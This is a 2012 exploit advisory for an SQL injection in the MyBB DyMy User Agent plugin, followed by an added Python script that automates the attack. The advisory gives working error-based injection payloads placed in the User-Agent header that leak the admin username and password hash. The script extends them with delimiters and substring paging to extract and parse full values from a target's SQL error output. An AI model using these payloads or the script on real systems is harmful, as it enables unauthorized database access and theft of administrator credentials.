############################################################################
# Exploit title : MyBB DyMy User Agent Plugin SQL injection vulnerability. #
# Author: JoinSe7en                                                        #
# Date : 13 Dec 2012                                                       #
# Tested on : Linux                                                        #
# Category : Web Applications                                              #
# Software Link : http://mods.mybb.com/view/dymy-user-agent                #
############################################################################

[*] PoC (receive admin username)

We fire up Live HTTP Headers or a similar tool, post something and press 'replay'.
We then replace our User-Agent with the following query:

POST http://localhost/mybb/newreply.php?ajax=1

HTTP Headers:
Host: localhost
User-Agent: ' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)); #

Output:
SQL Error: 1062 - Duplicate entry 'admin1' for key 'group_key'

+------------------------------------------------------------------+

[*] PoC (receive admin password)

We then replace our User-Agent with the following query:

POST http://localhost/mybb/newreply.php?ajax=1

HTTP Headers:
Host: localhost
User-Agent: ' and(select 1 from(select count(*),concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)); #

Output:
SQL Error: 1062 - Duplicate entry '098f6bcd4621d373cade4e832627b4f6' for key 'group_key'

+------------------------------------------------------------------+

Enjoy.
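The two PoCs above are instances of one technique: the plugin writes the raw User-Agent into a query, and the injected subquery abuses the seeded rand(0) so that GROUP BY hits the same key twice, making MySQL echo the concat()'d value in its 1062 error. The script below is an added example, not part of the advisory or of the plugin's code; it rebuilds that payload and parses the leak out of the response. It goes beyond the advisory's payload in two ways that are my own additions: the leaked value is wrapped in 0x3a3a ("::") delimiters so the trailing 0/1 from floor(rand(0)*2) can be split off without guessing, and substring() is used to page through values longer than the error message shows (MySQL truncates the echoed key, at 64 characters on the versions I have seen). TARGET is the localhost URL from the advisory and assumes a reachable install; the sample response is constructed. The technique only works when the application renders the SQL error to the client, as MyBB does in the advisory's output.

```python
"""Replay the DyMy User Agent injection from the advisory and pull the leaked
value out of MyBB's SQL error text. Added example, not the advisory's own code."""
import re
import urllib.request

# URL from the advisory; assumed to be a reachable MyBB install with the plugin.
TARGET = "http://localhost/mybb/newreply.php?ajax=1"
# Delimiters (hex literal for "::") wrapped around the leaked value so the
# trailing 0/1 from floor(rand(0)*2) can be split off. Our addition.
DELIM_HEX = "0x3a3a"
DELIM = "::"


def build_payload(column, uid=1, table="mybb_users", offset=1, length=60):
    """Return the User-Agent string for the duplicate-group-key trick.

    rand(0) is seeded, so floor(rand(0)*2) yields the fixed sequence 0,1,1,0,1,1,...
    across the rows of information_schema.tables; GROUP BY then tries to insert
    the same key twice into its temporary table and MySQL raises error 1062,
    whose message echoes the offending key, i.e. our concat() with the subquery
    result inside. substring(offset, length) pages through long values because
    MySQL truncates the key it echoes (assumed 64 characters here).
    """
    sub = "(select substring(%s,%d,%d) from %s where uid=%d)" % (
        column, offset, length, table, uid)
    return ("' and(select 1 from(select count(*),concat(%s,%s,%s,floor(rand(0)*2))a "
            "from information_schema.tables group by a)b)); #"
            % (DELIM_HEX, sub, DELIM_HEX))


LEAK_RE = re.compile(r"Duplicate entry '(.*?)' for key '")


def parse_leak(body):
    """Extract the value between the delimiters from a 1062 message, else None."""
    m = LEAK_RE.search(body)
    if not m:
        return None
    entry = m.group(1)
    if entry.count(DELIM) < 2:
        return None  # not our delimited payload (e.g. the advisory's raw form)
    start = entry.index(DELIM) + len(DELIM)
    end = entry.index(DELIM, start)
    return entry[start:end]


def fetch(column, **kw):
    """POST the injected User-Agent to TARGET and return the parsed leak (network)."""
    req = urllib.request.Request(TARGET, data=b"", method="POST")
    req.add_header("User-Agent", build_payload(column, **kw))
    with urllib.request.urlopen(req) as resp:
        return parse_leak(resp.read().decode("utf-8", "replace"))


# Constructed sample response, shaped like the advisory's output plus our delimiters.
SAMPLE_RESPONSE = "SQL Error: 1062 - Duplicate entry '::admin::1' for key 'group_key'"

if __name__ == "__main__":
    print(build_payload("username"))
    print(parse_leak(SAMPLE_RESPONSE))
```

To dump a full 32-character MyBB password hash in one go, call fetch("password"); for anything longer than the echoed key limit, loop over offset in steps of length and concatenate the pieces.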